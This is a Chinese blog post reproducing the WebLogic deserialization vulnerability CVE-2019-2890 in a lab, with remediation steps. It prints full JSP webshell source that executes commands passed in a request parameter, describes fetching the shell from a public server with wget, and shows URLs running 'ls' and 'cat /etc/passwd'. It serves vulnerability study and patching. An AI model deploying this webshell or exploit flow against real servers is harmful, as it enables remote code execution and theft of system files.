WebLogic 反序列化漏洞(CVE-2019-2890)复现

最新推荐文章于 2023-09-19 14:08:43 发布
最新推荐文章于 2023-09-19 14:08:43 发布
阅读量244 收藏 1
点赞数 1
分类专栏: 网络安全 漏洞复现 文章标签: weblogic 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37602797/article/details/116722282
版权

图片

WebLogic 反序列化漏洞(CVE-2019-2890)

图片

一、漏洞描述

2019年10月15日,Oracle官方发布了2019年10月安全更新公告,其中包含了一个可造成RCE远程任意代码执行的高危漏洞,漏洞编号为CVE-2019-2890。

Weblogic在利用T3协议进行远程资源加载调用时,默认会进行黑名单过滤以保证反序列化安全。本漏洞绕过了Weblogic的反序列化黑名单,使攻击者可以通过T3协议对存在漏洞的Weblogic组件实施远程攻击。由于T3协议在Weblogic控制台开启的情况下默认开启,而Weblogic默认安装会自动开启控制台,所以攻击者可通过此漏洞造成远程代码执行,以控制Weblogic服务器。

二、影响范围

WebLogic Server 10.3.6.0

WebLogic Server 12.1.3.0

WebLogic Server 12.2.1.3

环境下载和POC:后台回复“weblogic”

漏洞环境可自行安装教程参考( https://www.cnblogs.com/Jackie-Chen/p/10539660.html)

三、漏洞利用

环境搭建ok

图片

上传webshell

首先放置一个shell.txt到公网服务器上,使用wget去下载它,写入到服务器里面

图片

CMD码的源代码:

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("thelostworld".equals(request.getParameter("password"))&&!"".equals(request.getParameter("command"))){out.println(""+excuteCmd(request.getParameter("command"))+"
");}else{out.println(":-)");}%>

cmd码上传成功:

图片

写入成功

图片

访问对应的webshell

http://192.168.0.102:7001/_async/cmd.jsp?password=secfree&&command=ls

本版本(WebLogic Server 10.3.6.0)此路径有限制

图片

参考复现博客(https://blog.csdn.net/southwind0/article/details/102654374)这里是可以操作的

图片

尝试多种前期的weblogic的几种路径

http://192.168.0.102:7001/bea_wls_internal/shell.jsp?password=secfree&command=cat%20/etc/passwd

图片

四、修复方案

1.更新Oracle 2019年10月补丁

https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html

2.控制T3协议的访问

此漏洞产生于WebLogic的T3服务,因此可通过控制T3协议的访问来临时阻断针对该漏洞的攻击。当开放WebLogic控制台端口(默认为7001端口)时,T3服务会默认开启。具体操作:

(1)进入WebLogic控制台,在base_domain的配置页面中,进入“安全”选项卡页面,点击“筛选器”,进入连接筛选器配置。

(2)在连接筛选器中输入:weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则中输入:127.0.0.1 * * allow t3 t3s,0.0.0.0/0 * * deny t3 t3s(t3和t3s协议的所有端口只允许本地访问)。

(3)保存后需重新启动,规则方可生效。

参考文献:

https://blog.csdn.net/southwind0/article/details/102654374

https://github.com/SukaraLin/CVE-2019-2890

环境下载和POC:后台回复“weblogic”

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

图片

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书:https://www.jianshu.com/u/bf0e38a8d400

thelostworld-公众号
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2023-21839:Weblogic反序列化漏洞复现
薛定谔嘚喵博客
04-16 3258
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
WebLogic CVE-2021-2394 RCE 漏洞分析
HBohan的博客
07-26 2529
漏洞简述 2021年3月15日墨云安全V-Lab实验室向Oracle官方报告了Weblogic Server RCE漏洞,2021年7月21日Oracle发布了致谢信息。 这是一个二次反序列化漏洞,是cve-2020-14756和cve-2020-14825的调用链相结合组成一条新的调用链来绕过weblogic黑名单列表。 漏洞分析 最开始我是发现了oracle.eclipselink.coherence.integrated.internal.cache.SerializationHelper类中的re.
CVE-2019-2890
03-08
声明 仅用于学习交流使用,其他用途后果自负。 说明 已经将相关jar文件都导入到了项目中,并且利用方式采用yso的JRMP,学习调试时候可以修改利用方式。 首先需要将weblogic下的SerializedSystemIni.dat文件放置到安全文件夹下。 然后需要将yso重命名为ysoserial.jar ,并导入到lib目录下。 进入weblogic / wsee / jaxws / persistence / PersistentContext.java中的getObject的IP地址和端口。 try { var3.writeObject(Poc.getObject("127.0.0.1:8000")); } catch (Exception e) { e.printStackTrace();
WebLogic 反序列化漏洞(CVE-2019-2890)复现(超详细)
热门推荐
yy
03-16 1万+
目录 一. 漏洞介绍 二. 影响范围 三. 漏洞环境搭建 四. 漏洞复现 五. 漏洞修复 六. 漏洞检测poc 很多漏洞复现文章都不够详细,就是你按照他写的去复现会出很多很多的问题。我综合了几篇文章,写下这最详细的复现步骤。希望能帮助大家少走弯路 一. 漏洞介绍 2019年10月15日,Oracle官方发布了2019年10月安全更新公告,其中包含了一个可造成RCE远程任意代码执行的高危漏洞漏洞编号为CVE-2019-2890。 Weblogi...
【网络安全---漏洞复现WebLogic 反序列化漏洞(CVE-2019-2890)漏洞复现
最新发布
m0_67844671的博客
09-19 830
Weblogic在利用T3协议进行远程资源加载调用时,默认会进行黑名单过滤以保证反序列化安全。本漏洞绕过了Weblogic反序列化黑名单,使攻击者可以通过T3协议对存在漏洞Weblogic组件实施远程攻击。由于T3协议在Weblogic控制台开启的情况下默认开启,而Weblogic默认安装会自动开启控制台,所以攻击者可通过此漏洞造成远程代码执行,以控制Weblogic服务器。
WebLogic 反序列化漏洞(CVE-2019-2890)
午夜观星河
10-20 3196
WebLogic 反序列化漏洞(CVE-2019-2890) 漏洞描述 2019年10月15日,Oracle官方发布了2019年10月安全更新公告,其中包含了一个可造成RCE远程任意代码执行的高危漏洞漏洞编号为CVE-2019-2890Weblogic在利用T3协议进行远程资源加载调用时,默认会进行黑名单过滤以保证反序列化安全。本漏洞绕过了Weblogic反序列化黑名单,使攻击者可以...
php反序列化cve漏洞复现,CVE-2019-2890 Weblogic t3反序列化漏洞分析
weixin_36046574的博客
04-08 291
@Adminxe0x01 漏洞背景在WebLogic官方发布的10月份安全补丁中,包含了由Venustech ADLab提交的CVE-2019-2890的修复。该漏洞通过T3协议发送恶意的反序列化数据绕过了Weblogic的黑名单,成功反序列化执行任意命令。通过官方公告可知,该漏洞的利用条件是需要认证。0x02 影响范围Weblogic 10.3.6.0.0Weblogic 12.1.3.0.0W...
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .txt
06-27
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .网上几乎没有,请珍惜。
CVE-2019-2725:WebLogic安全反序列化-CVE-2019-2725有效负载生成器和漏洞利用
04-25
CVE-2019-2725 WebLogic Universal Exploit-CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729有效负载生成器和利用信息/帮助$ python3 weblogic_exploit.py -h====================================...
Weblogic XML反序列化漏洞CVE-2017-10271
04-16
Weblogic XML反序列化漏洞CVE-2017-1027
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
CVE-2019-2888:WebLogic EJBTaglibDescriptor XXE扩展(CVE-2019-2888)
03-09
CVE-2019-2888 WebLogic EJBTaglibDescriptor XXE漏洞 fernflower.jar weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class ╭─root@jas502n /var ╰─# find ./ |grep EJBTaglibDescriptor  :...
Weblogic反序列化命令执行漏洞CVE-2018-2628)复现
君莫hacker的博客
09-11 9813
目录0x01 漏洞介绍0x02 环境部署:0x03 漏洞复现0x04 漏洞修复 0x01 漏洞介绍 漏洞描述 Weblogic Server WLS Core Components反序列化命令执行漏洞CVE-2018-2628),该漏洞通过T3协议触发,可导致未授权的用户在远程服务器执行任意命令 漏洞编号 CVE-2018-2628 受影响版本 Weblogic 10.3.6.0 Weblogic 12.1.3.0 Weblogic 12.2.1.2 Weblogic 12.2.1.3 0
CVE-2019-9995复现并改写exp
Seizerz的博客
09-06 718
一、漏洞介绍 DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机,相对于传统的模拟摄像录像机,采用硬盘录像,故常常被称为硬盘录像机,也被称为DVR。它是一套进行图像计算存储处理的计算机系统,具有对图像/语音和动态帧等进行长时间录像、录音、远程监视和控制的功能,DVR集合了录像机、画面分割器、云台镜头控制、报警控制、网络传输等五种功能于一身,用一台设备就能取...
oracle 序列_【漏洞预警】WebLogic反序列化CVE-2019-2890漏洞预警
weixin_39753584的博客
12-02 199
2019年10月,白帽汇安全研究院监测到互联网上爆出了Weblogic反序列化远程命令执行漏洞WebLogic是美国Oracle公司出品的Java应用服务器,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用。攻击者可利用该漏洞在未经授权的攻击者可通过构造T3协议请求,绕过Weblogic反序列化黑名单,从而获取Weblogic服务器权限,风险较大。希望相关...
漏洞复现 - - - WebLogic反序列化远程命令执行漏洞(二)
weixin_67503304的博客
08-24 2144
使用payload方法复现WebLogic反序列化远程命令执行漏洞(CNVD-C-2019-48814)
CVE-2019-2890 Weblogic t3反序列化漏洞分析
Adminxe的博客
05-05 1107
@Adminxe 0x01 漏洞背景 在WebLogic官方发布的10月份安全补丁中,包含了由Venustech ADLab提交的CVE-2019-2890的修复。该漏洞通过T3协议发送恶意的反序列化数据绕过了Weblogic的黑名单,成功反序列化执行任意命令。通过官方公告可知,该漏洞的利用条件是需要认证。 0x02 影响范围 Weblogic 10.3.6.0.0 Weblog...
漏洞预警】WebLogic反序列化CVE-2019-2890漏洞预警
NOSEC2019的博客
10-23 1389
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-7GLiipQV-1571830854090)(https://nosec.org/avatar/uploads/attach/image/9a653247b09929f066d39c404c81c702/00.png)] 2019年10月,白帽汇安全研究院监测到互联网上爆出了Weblogic反序列化远程命令执行漏洞,W...
Weblogic IIOP反序列化漏洞(CVE-2020-2551)
07-28
关于Weblogic IIOP反序列化漏洞CVE-2020-2551),以下是一些相关信息: CVE-2020-2551是Weblogic Server的一个严重漏洞,该漏洞允许攻击者通过发送特制的T3协议请求来执行任意代码。这个漏洞属于Java反序列化漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值